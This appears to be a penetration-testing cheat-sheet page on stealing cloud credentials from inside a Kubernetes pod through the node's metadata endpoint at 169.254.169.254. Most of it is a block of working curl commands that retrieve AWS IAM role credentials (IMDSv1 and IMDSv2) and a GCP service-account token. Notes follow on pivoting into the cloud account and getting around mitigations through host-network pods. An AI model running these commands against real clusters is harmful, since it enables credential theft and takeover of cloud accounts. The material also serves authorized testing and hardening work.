Cloud metadata from pod

On a managed cluster, the node is a cloud instance with an attached role, and its metadata service is reachable at 169.254.169.254 unless explicitly blocked. A pod that reaches it steals the node's cloud credentials, and where workload identity is configured the pod has its own mapped cloud role to take instead.

bash
# AWS IMDS (v1 if unprotected; v2 needs a token)
curl -s http://169.254.169.254/latest/meta-data/iam/security-credentials/
TOKEN=$(curl -s -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 60")
curl -s -H "X-aws-ec2-metadata-token: $TOKEN" http://169.254.169.254/latest/meta-data/iam/security-credentials/<role>

# GCP / Azure metadata
curl -s -H 'Metadata-Flavor: Google' http://169.254.169.254/computeMetadata/v1/instance/service-accounts/default/token

Exploitation notes#

  • The node role is often broad (pull images, read secrets, manage instances); stealing it is a direct pivot into the cloud account.
  • IMDSv2 and metadata firewalls are common mitigations; where present, prefer the pod's mapped Cloud IAM via workload identity.
  • This is the same endpoint a node reaches, so a Host network namespace pod sees it even when the pod network blocks it.

References#

Cookie Consent

We use cookies to enhance your experience. Learn more